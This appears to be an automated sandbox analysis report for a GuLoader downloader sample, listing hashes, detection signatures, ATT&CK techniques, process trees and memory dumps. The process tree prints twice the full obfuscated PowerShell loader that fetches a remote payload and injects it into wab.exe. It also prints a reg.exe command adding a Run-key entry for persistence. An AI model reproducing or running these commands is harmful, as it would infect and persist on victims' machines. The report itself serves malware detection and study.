guloader | acf265447a05d1483e012d7051cfe22f336146b2cff6218453440923fd6d8c83

Analysis

max time kernel
131s
max time network
133s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
26-06-2024 20:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

rOrdinen_487685934GIANCARLOC_s_r_lconvulsional.bat
Size

7KB
MD5

e10969ce40099c5ac570b221d3ec6517
SHA1

c1c2f30a7e7bfede1608e27cbe925f09525e1459
SHA256

acf265447a05d1483e012d7051cfe22f336146b2cff6218453440923fd6d8c83
SHA512

d7c3785b4098cf2a45f08cbfe7a5a0e272d2f02e273f2b05da9d050d01019fad671a3fdd9a6c710434c9f43a141a6154bcce64dcface6696ca173ab23ee30923
SSDEEP

192:3+g9OFNNtGLqR4AifzVZrlhddjQEXpdq6P1zoK/J8e7I63iLAn:OZFRG1AibRdjQEXaSBx8ypn

Score

10^/10

guloader downloader execution persistence

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

9 2040 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2040 powershell.exe

flow	pid	process
9	2040	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Dorthies = "%sabbatshvilen% -w 1 $Nitrifiable=(Get-ItemProperty -Path 'HKCU:\\Bedrevne\\').Elevraadsmdet;%sabbatshvilen% ($Nitrifiable)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

Processes:

wab.exe

pid process

1884 wab.exe
1884 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

4248 powershell.exe
1884 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 4248 set thread context of 1884 4248 powershell.exe wab.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3948 reg.exe

pid	process
1884	wab.exe
1884	wab.exe

pid	process
4248	powershell.exe
1884	wab.exe

description	pid	process	target process
PID 4248 set thread context of 1884	4248	powershell.exe	wab.exe

pid	process
3948	reg.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid	process
2040	powershell.exe
2040	powershell.exe
4248	powershell.exe
4248	powershell.exe
4248	powershell.exe
4248	powershell.exe
1884	wab.exe
1884	wab.exe
1884	wab.exe
1884	wab.exe
1884	wab.exe
1884	wab.exe
1884	wab.exe
1884	wab.exe
1884	wab.exe
1884	wab.exe
1884	wab.exe
1884	wab.exe
1884	wab.exe
1884	wab.exe

Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

powershell.exe

pid process

4248 powershell.exe
4248 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2040 powershell.exe
Token: SeDebugPrivilege 4248 powershell.exe

pid	process
4248	powershell.exe
4248	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2040	powershell.exe
Token: SeDebugPrivilege	4248	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

Processes:

cmd.exepowershell.exepowershell.exewab.execmd.exe

description	pid	process	target process
PID 2564 wrote to memory of 2040	2564	cmd.exe	powershell.exe
PID 2564 wrote to memory of 2040	2564	cmd.exe	powershell.exe
PID 2040 wrote to memory of 1260	2040	powershell.exe	cmd.exe
PID 2040 wrote to memory of 1260	2040	powershell.exe	cmd.exe
PID 2040 wrote to memory of 4248	2040	powershell.exe	powershell.exe
PID 2040 wrote to memory of 4248	2040	powershell.exe	powershell.exe
PID 2040 wrote to memory of 4248	2040	powershell.exe	powershell.exe
PID 4248 wrote to memory of 2964	4248	powershell.exe	cmd.exe
PID 4248 wrote to memory of 2964	4248	powershell.exe	cmd.exe
PID 4248 wrote to memory of 2964	4248	powershell.exe	cmd.exe
PID 4248 wrote to memory of 1848	4248	powershell.exe	wab.exe
PID 4248 wrote to memory of 1848	4248	powershell.exe	wab.exe
PID 4248 wrote to memory of 1848	4248	powershell.exe	wab.exe
PID 4248 wrote to memory of 1884	4248	powershell.exe	wab.exe
PID 4248 wrote to memory of 1884	4248	powershell.exe	wab.exe
PID 4248 wrote to memory of 1884	4248	powershell.exe	wab.exe
PID 4248 wrote to memory of 1884	4248	powershell.exe	wab.exe
PID 4248 wrote to memory of 1884	4248	powershell.exe	wab.exe
PID 1884 wrote to memory of 5036	1884	wab.exe	cmd.exe
PID 1884 wrote to memory of 5036	1884	wab.exe	cmd.exe
PID 1884 wrote to memory of 5036	1884	wab.exe	cmd.exe
PID 5036 wrote to memory of 3948	5036	cmd.exe	reg.exe
PID 5036 wrote to memory of 3948	5036	cmd.exe	reg.exe
PID 5036 wrote to memory of 3948	5036	cmd.exe	reg.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rOrdinen_487685934GIANCARLOC_s_r_lconvulsional.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "cls;write 'Lunke Adstringerende Typograferet Merianernes Abonnementsfunktionen Dueller Paadrages Lavprisvarehusets babyliften Hithertoward';$Sengestolpens = 1;Function metadiabase($Fordeal){$Amenance=$Fordeal.Length-$Sengestolpens;$brnetjs='SUBSTRIN';$brnetjs+='G';For( $Luderne=5;$Luderne -lt $Amenance;$Luderne+=6){$Lunke+=$Fordeal.$brnetjs.Invoke( $Luderne, $Sengestolpens);}$Lunke;}function Lapcock($noninfusibness){ & ($afkastningsgraden) ($noninfusibness);}$Ngtelser=metadiabase ' muniM DeeroGastrzUnplaiFrstel FortlStempaAfson/Eucal5Fitzc.Aarhu0R,tte Macro(electWUgli i Su,enL.kfjdKatodoProfew Jo.dsUnaer HelbeNprotoTfarup budge1.vers0Un.ol.Ka an0Ek po;Relap TraveW,atrii retanAperc6Delpr4Brems; Rom. kaemxObse 6Stand4Accur; frai ,irkerVarevv S,og:Stylt1Udrej2Socia1timo..,edal0Papil)Cleuk XenogG Arc.e H.vacVr,lekLoricoMilie/ Bes.2 Slee0Samme1 Temp0f.nkt0Opfan1 Af e0Spast1Vomme KongFIntariGrav r,nglaeUn.erfpal.eoK allxUnh,a/Manua1safeg2mixer1Ulovm.Distr0Reint ';$Svveflyenes213=metadiabase 'Fad eU SpdbsKarbue Euphr Bisa- St,nAfj.rdg Ka,ieAnstanForsetTermi ';$Abonnementsfunktionen=metadiabase 'IsbryhinvaltBrutetDoitepProna:Dis.r/ Pr,c/DireckGarniaLu.gerKadavoFora.oDatatn pinepKnudecForre. Fuldc Doraochu dmSkri /IblanDV,pste erfecCalibcPr vaaWasqusomp.atAlarmaStrontSalgsiAmphioBema.nIntaceForharVoyagsbambo.Oo ynmTaabesTiosui Emeu ';$tabuleringernes=metadiabase ' Bost>Illeg ';$afkastningsgraden=metadiabase ' Tilsi SceneTarmrxBetto ';$Prcedensers='Lavprisvarehusets';$Serviceberry40 = metadiabase 'Remise Fer,c I idhRuentoDds.g Haan.%cong,aPhy lpMithep destdAppl aDa aitInitia.ccen%Gogop\Ti,sii Pe snTyn.seUbi,ux HexatSe iqedegr,n Id.ms .rueiSpa ebInfeli Tit,lTechniDelfit.taniyAdre..C.mitPDessia Hi.mrKalk. Ju.as&Bra e&Embed Ef,ereParticLogiehSpiseoUdsyn cochtIonos ';Lapcock (metadiabase ' Yest$SukkegPaatrlSu.keoSphecblageraD,serlG ost:BengtN PebeoKn pbn FletsStr tp Bee,i,evsknDeadsoCofous FriseSk,helValbyyTeks = Stag( Rellc.krinmAnhedd aver Ov rr/CoadmcBlokd Sk,l$JavanS Top eBofforHausavAn.epiU,lercInd,reKloa,b DelaePiercr,ihuerPupaey Anal4 fodb0Restu)for,e ');Lapcock (metadiabase 'Charl$Boog.gAppellKoke oAdaptbBuskmaVaretlPaahl:TraadMLy.nse Til rVenguiOliv.aDvrgen Ibsee Un erK,ammnC.ntdeLi.gvsJoggi=Unres$Beta Asemi bunr.fo Monon ObsenBoggaeUundgmGastreTypennEntret spars vitifFladbuOpposnExsa kjubilt C.rkiReageoLandbnUnliteSerennBorge.Bar,esRetorpSponglS.rgeiAll.ctPulli(Sma.d$OutlytSalgsaTllevbUnp,vuSlap lMorskeStrucrAutotiUndernVigregFjernehaerfrForelnJun he,irdesBitto)Forsy ');Lapcock (metadiabase 'Kde t[pitieNA romeScriptFa.ve. BiomSSpinde,tnkerHur.lv VarmiSang,cRevolebasigPMontroKu usibrdden St rtTileeMRadmaaUndernD bita Su rgPlat ekommurtilsm]ekspe:U rli: W ndSVokseepar,lc Co.guExoserRumsti .etttFjel.yPers,P HybrrSewero amletCoineo piercTilsto Fi elTonom Begra=Finde Wy ta[OutdrNGangleVa,elt Susu.Lr,stSRe.iee LubccPuljeu Momsr PrveibaraztLysegyRepl,PudhngrKonveosup rtBredboDow,bcst.rkoDrawelSkr.kTFove.yfrisppUnkineUniv ]br.nd:Uncos: onomTUnde,lWinessStyrt1Socio2 File ');$Abonnementsfunktionen=$Merianernes[0];$Benchership= (metadiabase 'Under$Lullig AncilTeks.oreconbOu,coaSammelAfsej:UnintoLyrikuPja.kt Sungrooecii BeskbId.lebBebotilssernClassg ardd=HrelsNKla ienoncawY ded-FngseOGldstb.devaj Afgoe D.mbcAfdrotSampa BundsSMu cuyEkspls Ba,itSapo eHovedmUnca . Cyp.NBlodbeMumbltTes.a.NazarWUnquieVarskbValduC RapplDespoiTenteekontrnReno t');$Benchership+=$Nonspinosely[1];Lapcock ($Benchership);Lapcock (metadiabase ' Sp.o$Afsmio FrikuFij,at,emflr ,ordiHosenbTilvrb R.kei.pilonHypergfrict.KakatHLiflieVriknaMajond,nquoeUdkryrMicrosHyrer[ Fors$Ca atSMicr,vMask,vPoetieExtrafMoravlGanglyDisb e UndenSuc ie FarbsUdsig2Tyler1 T te3K,ing] Vana= Tr.m$PermuNTran gErobrtCit.ieHandllHo sesSwel.eJerrerW,tli ');$Climatolog59=metadiabase 'Multi$ RailoPrea u H.mat CaisrLokaliT.manbSabotbLa eri andbnApo tgEndop. EquiDPawawoT.pmawProxin omplsubiyoBygakaBabbldVexilFD,mpniProaglHilloeRever(Claus$FerieA SortbPomivoprecon flaan SurceDegram AandeGelatnAlaudt.nextsUnvigfTryk uda.nsnOver kUterutJulesiUf jloHyd inBrokketrakknHj pe,kasse$PlaneWCavith Retoi CoxomPetresBespie lydsy BeslsVe.ar)Fa ee ';$Whimseys=$Nonspinosely[0];Lapcock (metadiabase '.atab$AmatrgCom el Sofao At rbNec,sa FodvlFlapp:ElbowLProxiaSnou,t GambiKortsnT,lsleUformrAffr.eBristn .eep=Flin.(FlugtTLaureeLogomsByggetAmt.l-DebelPFerulaMa.eftRyolfh Com Siest$ToadiW ru dhHelseiR,dobmPsychsUov reShoweyCrap,sAuroc) Taab ');while (!$Latineren) {Lapcock (metadiabase ' Virk$CykelgHarmolDiscioStoneb eldiaGareklStret:MesseMpriski nebosSporoh ,ivea ,ontgSerafsNoter=Inter$ButtetD narrBura,uDeceneFaggr ') ;Lapcock $Climatolog59;Lapcock (metadiabase 'NavneSpermit EvanaMjsomrUnb,otDiese-Na htSCabbalOmbude BasteChaptp.nsea Fes i4 .nte ');Lapcock (metadiabase ' Metr$GerlagKlonglUnaboo UspobPhormaBourglCount:A bejLPleioaHi.tot rundiMouthn Blege reinrSandbe skytn elvu= Semi(StraaTPal eeLaanesGalactPytha-Nrbi.P Eer.aPsychtde adhRootw Lango$Omsa WShutohRanaciRekvimMeninsbemgteNonseydataksZo.ce) God. ') ;Lapcock (metadiabase 'Lemfl$brneog PakvlLu,keoMishnbEkspraSelvbl Sknh:SprecTO,ergyEmaljpTrn toSavfigUn,rorTergiaPlotif BrndeAfl.crb aase IneftForsk=Rhabd$Opgang Ph.slTan,boAccepb.mphoaTumbolImpar:Unan,A .ubgd.hirts FremtGuararK,rdiiPi senTautogCaneleE zymrK,erne jordn Tra,d Gr,vemonos+samme+Swadd%O.ers$MediaMShe.aeElectr Mil i LaboaVinylnHej.eeTallerdo.benhaditeIndbasThist.K nfocStoddoMegaluUnsinn G,yctWilmi ') ;$Abonnementsfunktionen=$Merianernes[$Typograferet];}$Cedertrernes=310097;$Fusoid=30197;Lapcock (metadiabase 'Henla$Ble.fgLea.elRundloBryskbHaireaPro.elUntim:SkrmmbSpndtaHamarbI,neryL rdslNamepiEst.mfHeathtIn.tiePraktnPlads Hoses=Damer P,rsoG SortePinctt Sn.p-SanseCAllokosl dsn HelttElinseraakin LntatG.asf Dr ll$Dish WIndskhSta,tiGuruemConvesKle teOrdstyPrvessKonst ');Lapcock (metadiabase ',mper$RaccogHaliblDiscooOrganb,mpstaSlugtlDisan: LnniU Vaa d avols Overl AnisiF rtrdCalvitundev9 Anci8 pyra proph=Spejd Trosk[AkrotSEvecty,rtissOrthotsulfie SnavmTick . AmmoC StdeoDisk,nAerosv NonbeNecesrtr.mptOcclu]Ek,kl:Inter:LightF In urSpi,loPrimrmCompoB EmbaaMunsisTin.se Fylk6Subbr4LanthSAcceltBrevsrModeriF rsvnMaringSixgu(Geneo$FieldbTilseaUnderb Ich yBe.halOverbiPeni,fForegtStuggeaquafnLitur) Dir ');Lapcock (metadiabase 'Gliri$skjorgDummel Und oProagbArtsbaHematlR.mel:Afri TStbe.eInfarg etanSlattsForlbt A bir To.nrCathreEx,rilIcebosforsbeBrnevn odsv Unsi=Sregn Wacky[ OpslSbenjaysubo,sSgeprtTest eV,deom,ludf.Ret,rTSkatteRenunxMddint Blge.Ring,E SelvnEquivc.olypoAlephdArbejiTalksnur.ehgbgetr] Suba: Sent:FugtsAT.rifS .mklCnonplIGr,nkI Mips.SuperGTaxoleStat,t D taSBindit Skolr LaboiMaw.lnRoyalgHous,(Lumin$Fill.UPou ddLaures UplalBeachiPromudSubt tNonel9Int r8Tinge)tapli ');Lapcock (metadiabase 'Miske$Dent gSki.plPostwoA,rinbreseraudtrelOvers:En heKPortho ellenpl,jetJargor nisoaSibylsIntertReacceD.mhur CongeSlutttEfter=Quive$UnderTPantoeSolskgCaba.nPothesKi,ketForharDep,trFrdigeStilelIta.isA,giseperipn.lang.F,ammsSp,ceuT.itabEnt.psPeriftRenskrQuadriSkospnP.ilogTovt.(Mar.u$,iffeCFrekveMultidRosete NonprBoot,tC,ntarEvaluetal.hrBarranShukueunmals str,, semi$Fri,aFUny cuFle ss G nio Homei GravdFa,ri)Laryn ');Lapcock $Kontrasteret;"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2040

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\inextensibility.Par && echo t"
3⤵
PID:1260

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Lunke Adstringerende Typograferet Merianernes Abonnementsfunktionen Dueller Paadrages Lavprisvarehusets babyliften Hithertoward';$Sengestolpens = 1;Function metadiabase($Fordeal){$Amenance=$Fordeal.Length-$Sengestolpens;$brnetjs='SUBSTRIN';$brnetjs+='G';For( $Luderne=5;$Luderne -lt $Amenance;$Luderne+=6){$Lunke+=$Fordeal.$brnetjs.Invoke( $Luderne, $Sengestolpens);}$Lunke;}function Lapcock($noninfusibness){ & ($afkastningsgraden) ($noninfusibness);}$Ngtelser=metadiabase ' muniM DeeroGastrzUnplaiFrstel FortlStempaAfson/Eucal5Fitzc.Aarhu0R,tte Macro(electWUgli i Su,enL.kfjdKatodoProfew Jo.dsUnaer HelbeNprotoTfarup budge1.vers0Un.ol.Ka an0Ek po;Relap TraveW,atrii retanAperc6Delpr4Brems; Rom. kaemxObse 6Stand4Accur; frai ,irkerVarevv S,og:Stylt1Udrej2Socia1timo..,edal0Papil)Cleuk XenogG Arc.e H.vacVr,lekLoricoMilie/ Bes.2 Slee0Samme1 Temp0f.nkt0Opfan1 Af e0Spast1Vomme KongFIntariGrav r,nglaeUn.erfpal.eoK allxUnh,a/Manua1safeg2mixer1Ulovm.Distr0Reint ';$Svveflyenes213=metadiabase 'Fad eU SpdbsKarbue Euphr Bisa- St,nAfj.rdg Ka,ieAnstanForsetTermi ';$Abonnementsfunktionen=metadiabase 'IsbryhinvaltBrutetDoitepProna:Dis.r/ Pr,c/DireckGarniaLu.gerKadavoFora.oDatatn pinepKnudecForre. Fuldc Doraochu dmSkri /IblanDV,pste erfecCalibcPr vaaWasqusomp.atAlarmaStrontSalgsiAmphioBema.nIntaceForharVoyagsbambo.Oo ynmTaabesTiosui Emeu ';$tabuleringernes=metadiabase ' Bost>Illeg ';$afkastningsgraden=metadiabase ' Tilsi SceneTarmrxBetto ';$Prcedensers='Lavprisvarehusets';$Serviceberry40 = metadiabase 'Remise Fer,c I idhRuentoDds.g Haan.%cong,aPhy lpMithep destdAppl aDa aitInitia.ccen%Gogop\Ti,sii Pe snTyn.seUbi,ux HexatSe iqedegr,n Id.ms .rueiSpa ebInfeli Tit,lTechniDelfit.taniyAdre..C.mitPDessia Hi.mrKalk. Ju.as&Bra e&Embed Ef,ereParticLogiehSpiseoUdsyn cochtIonos ';Lapcock (metadiabase ' Yest$SukkegPaatrlSu.keoSphecblageraD,serlG ost:BengtN PebeoKn pbn FletsStr tp Bee,i,evsknDeadsoCofous FriseSk,helValbyyTeks = Stag( Rellc.krinmAnhedd aver Ov rr/CoadmcBlokd Sk,l$JavanS Top eBofforHausavAn.epiU,lercInd,reKloa,b DelaePiercr,ihuerPupaey Anal4 fodb0Restu)for,e ');Lapcock (metadiabase 'Charl$Boog.gAppellKoke oAdaptbBuskmaVaretlPaahl:TraadMLy.nse Til rVenguiOliv.aDvrgen Ibsee Un erK,ammnC.ntdeLi.gvsJoggi=Unres$Beta Asemi bunr.fo Monon ObsenBoggaeUundgmGastreTypennEntret spars vitifFladbuOpposnExsa kjubilt C.rkiReageoLandbnUnliteSerennBorge.Bar,esRetorpSponglS.rgeiAll.ctPulli(Sma.d$OutlytSalgsaTllevbUnp,vuSlap lMorskeStrucrAutotiUndernVigregFjernehaerfrForelnJun he,irdesBitto)Forsy ');Lapcock (metadiabase 'Kde t[pitieNA romeScriptFa.ve. BiomSSpinde,tnkerHur.lv VarmiSang,cRevolebasigPMontroKu usibrdden St rtTileeMRadmaaUndernD bita Su rgPlat ekommurtilsm]ekspe:U rli: W ndSVokseepar,lc Co.guExoserRumsti .etttFjel.yPers,P HybrrSewero amletCoineo piercTilsto Fi elTonom Begra=Finde Wy ta[OutdrNGangleVa,elt Susu.Lr,stSRe.iee LubccPuljeu Momsr PrveibaraztLysegyRepl,PudhngrKonveosup rtBredboDow,bcst.rkoDrawelSkr.kTFove.yfrisppUnkineUniv ]br.nd:Uncos: onomTUnde,lWinessStyrt1Socio2 File ');$Abonnementsfunktionen=$Merianernes[0];$Benchership= (metadiabase 'Under$Lullig AncilTeks.oreconbOu,coaSammelAfsej:UnintoLyrikuPja.kt Sungrooecii BeskbId.lebBebotilssernClassg ardd=HrelsNKla ienoncawY ded-FngseOGldstb.devaj Afgoe D.mbcAfdrotSampa BundsSMu cuyEkspls Ba,itSapo eHovedmUnca . Cyp.NBlodbeMumbltTes.a.NazarWUnquieVarskbValduC RapplDespoiTenteekontrnReno t');$Benchership+=$Nonspinosely[1];Lapcock ($Benchership);Lapcock (metadiabase ' Sp.o$Afsmio FrikuFij,at,emflr ,ordiHosenbTilvrb R.kei.pilonHypergfrict.KakatHLiflieVriknaMajond,nquoeUdkryrMicrosHyrer[ Fors$Ca atSMicr,vMask,vPoetieExtrafMoravlGanglyDisb e UndenSuc ie FarbsUdsig2Tyler1 T te3K,ing] Vana= Tr.m$PermuNTran gErobrtCit.ieHandllHo sesSwel.eJerrerW,tli ');$Climatolog59=metadiabase 'Multi$ RailoPrea u H.mat CaisrLokaliT.manbSabotbLa eri andbnApo tgEndop. EquiDPawawoT.pmawProxin omplsubiyoBygakaBabbldVexilFD,mpniProaglHilloeRever(Claus$FerieA SortbPomivoprecon flaan SurceDegram AandeGelatnAlaudt.nextsUnvigfTryk uda.nsnOver kUterutJulesiUf jloHyd inBrokketrakknHj pe,kasse$PlaneWCavith Retoi CoxomPetresBespie lydsy BeslsVe.ar)Fa ee ';$Whimseys=$Nonspinosely[0];Lapcock (metadiabase '.atab$AmatrgCom el Sofao At rbNec,sa FodvlFlapp:ElbowLProxiaSnou,t GambiKortsnT,lsleUformrAffr.eBristn .eep=Flin.(FlugtTLaureeLogomsByggetAmt.l-DebelPFerulaMa.eftRyolfh Com Siest$ToadiW ru dhHelseiR,dobmPsychsUov reShoweyCrap,sAuroc) Taab ');while (!$Latineren) {Lapcock (metadiabase ' Virk$CykelgHarmolDiscioStoneb eldiaGareklStret:MesseMpriski nebosSporoh ,ivea ,ontgSerafsNoter=Inter$ButtetD narrBura,uDeceneFaggr ') ;Lapcock $Climatolog59;Lapcock (metadiabase 'NavneSpermit EvanaMjsomrUnb,otDiese-Na htSCabbalOmbude BasteChaptp.nsea Fes i4 .nte ');Lapcock (metadiabase ' Metr$GerlagKlonglUnaboo UspobPhormaBourglCount:A bejLPleioaHi.tot rundiMouthn Blege reinrSandbe skytn elvu= Semi(StraaTPal eeLaanesGalactPytha-Nrbi.P Eer.aPsychtde adhRootw Lango$Omsa WShutohRanaciRekvimMeninsbemgteNonseydataksZo.ce) God. ') ;Lapcock (metadiabase 'Lemfl$brneog PakvlLu,keoMishnbEkspraSelvbl Sknh:SprecTO,ergyEmaljpTrn toSavfigUn,rorTergiaPlotif BrndeAfl.crb aase IneftForsk=Rhabd$Opgang Ph.slTan,boAccepb.mphoaTumbolImpar:Unan,A .ubgd.hirts FremtGuararK,rdiiPi senTautogCaneleE zymrK,erne jordn Tra,d Gr,vemonos+samme+Swadd%O.ers$MediaMShe.aeElectr Mil i LaboaVinylnHej.eeTallerdo.benhaditeIndbasThist.K nfocStoddoMegaluUnsinn G,yctWilmi ') ;$Abonnementsfunktionen=$Merianernes[$Typograferet];}$Cedertrernes=310097;$Fusoid=30197;Lapcock (metadiabase 'Henla$Ble.fgLea.elRundloBryskbHaireaPro.elUntim:SkrmmbSpndtaHamarbI,neryL rdslNamepiEst.mfHeathtIn.tiePraktnPlads Hoses=Damer P,rsoG SortePinctt Sn.p-SanseCAllokosl dsn HelttElinseraakin LntatG.asf Dr ll$Dish WIndskhSta,tiGuruemConvesKle teOrdstyPrvessKonst ');Lapcock (metadiabase ',mper$RaccogHaliblDiscooOrganb,mpstaSlugtlDisan: LnniU Vaa d avols Overl AnisiF rtrdCalvitundev9 Anci8 pyra proph=Spejd Trosk[AkrotSEvecty,rtissOrthotsulfie SnavmTick . AmmoC StdeoDisk,nAerosv NonbeNecesrtr.mptOcclu]Ek,kl:Inter:LightF In urSpi,loPrimrmCompoB EmbaaMunsisTin.se Fylk6Subbr4LanthSAcceltBrevsrModeriF rsvnMaringSixgu(Geneo$FieldbTilseaUnderb Ich yBe.halOverbiPeni,fForegtStuggeaquafnLitur) Dir ');Lapcock (metadiabase 'Gliri$skjorgDummel Und oProagbArtsbaHematlR.mel:Afri TStbe.eInfarg etanSlattsForlbt A bir To.nrCathreEx,rilIcebosforsbeBrnevn odsv Unsi=Sregn Wacky[ OpslSbenjaysubo,sSgeprtTest eV,deom,ludf.Ret,rTSkatteRenunxMddint Blge.Ring,E SelvnEquivc.olypoAlephdArbejiTalksnur.ehgbgetr] Suba: Sent:FugtsAT.rifS .mklCnonplIGr,nkI Mips.SuperGTaxoleStat,t D taSBindit Skolr LaboiMaw.lnRoyalgHous,(Lumin$Fill.UPou ddLaures UplalBeachiPromudSubt tNonel9Int r8Tinge)tapli ');Lapcock (metadiabase 'Miske$Dent gSki.plPostwoA,rinbreseraudtrelOvers:En heKPortho ellenpl,jetJargor nisoaSibylsIntertReacceD.mhur CongeSlutttEfter=Quive$UnderTPantoeSolskgCaba.nPothesKi,ketForharDep,trFrdigeStilelIta.isA,giseperipn.lang.F,ammsSp,ceuT.itabEnt.psPeriftRenskrQuadriSkospnP.ilogTovt.(Mar.u$,iffeCFrekveMultidRosete NonprBoot,tC,ntarEvaluetal.hrBarranShukueunmals str,, semi$Fri,aFUny cuFle ss G nio Homei GravdFa,ri)Laryn ');Lapcock $Kontrasteret;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4248

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\inextensibility.Par && echo t"
4⤵
PID:2964

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
PID:1848

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1884

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Dorthies" /t REG_EXPAND_SZ /d "%sabbatshvilen% -w 1 $Nitrifiable=(Get-ItemProperty -Path 'HKCU:\Bedrevne\').Elevraadsmdet;%sabbatshvilen% ($Nitrifiable)"
5⤵
- Suspicious use of WriteProcessMemory
PID:5036

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Dorthies" /t REG_EXPAND_SZ /d "%sabbatshvilen% -w 1 $Nitrifiable=(Get-ItemProperty -Path 'HKCU:\Bedrevne\').Elevraadsmdet;%sabbatshvilen% ($Nitrifiable)"
6⤵
- Adds Run key to start application
- Modifies registry key
PID:3948

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3468,i,6166776566165096562,4582328833313060853,262144 --variations-seed-version --mojo-platform-channel-handle=4124 /prefetch:8
1⤵
PID:4864

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_liwgg0el.bug.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\inextensibility.Par
Filesize
443KB

MD5
5144f4f71644edb5f191e12264318c87

SHA1
09a72b5870726be33efb1bcf6018e3d68872cc6d

SHA256
403f98abad4a3d681466b21dc3e31eb1b37ef8ca34d6f15db675b9260efe0993

SHA512
977f10a82de75fc841040d96e3e343f7607427470aa69d6d5c365d97e34d8595120932eb52a65d48199816c1a16054c0bca2f18e13da8acfe8679d9da4a87e9a

Download Submit
memory/1884-62-0x0000000000EB0000-0x0000000004DF1000-memory.dmp

Filesize
63.3MB

Download
memory/1884-52-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1884-54-0x0000000000EB0000-0x0000000004DF1000-memory.dmp

Filesize
63.3MB

Download
memory/2040-13-0x00007FFF91690000-0x00007FFF92151000-memory.dmp

Filesize
10.8MB

Download
memory/2040-58-0x00007FFF91690000-0x00007FFF92151000-memory.dmp

Filesize
10.8MB

Download
memory/2040-14-0x00007FFF91690000-0x00007FFF92151000-memory.dmp

Filesize
10.8MB

Download
memory/2040-2-0x00007FFF91693000-0x00007FFF91695000-memory.dmp

Filesize
8KB

Download
memory/2040-3-0x0000024F8F210000-0x0000024F8F232000-memory.dmp

Filesize
136KB

Download
memory/2040-46-0x00007FFF91690000-0x00007FFF92151000-memory.dmp

Filesize
10.8MB

Download
memory/2040-44-0x00007FFF91693000-0x00007FFF91695000-memory.dmp

Filesize
8KB

Download
memory/2040-45-0x00007FFF91690000-0x00007FFF92151000-memory.dmp

Filesize
10.8MB

Download
memory/4248-20-0x0000000074440000-0x0000000074BF0000-memory.dmp

Filesize
7.7MB

Download
memory/4248-23-0x0000000005FE0000-0x0000000006046000-memory.dmp

Filesize
408KB

Download
memory/4248-36-0x0000000006700000-0x000000000674C000-memory.dmp

Filesize
304KB

Download
memory/4248-37-0x0000000007F40000-0x00000000085BA000-memory.dmp

Filesize
6.5MB

Download
memory/4248-38-0x0000000006C30000-0x0000000006C4A000-memory.dmp

Filesize
104KB

Download
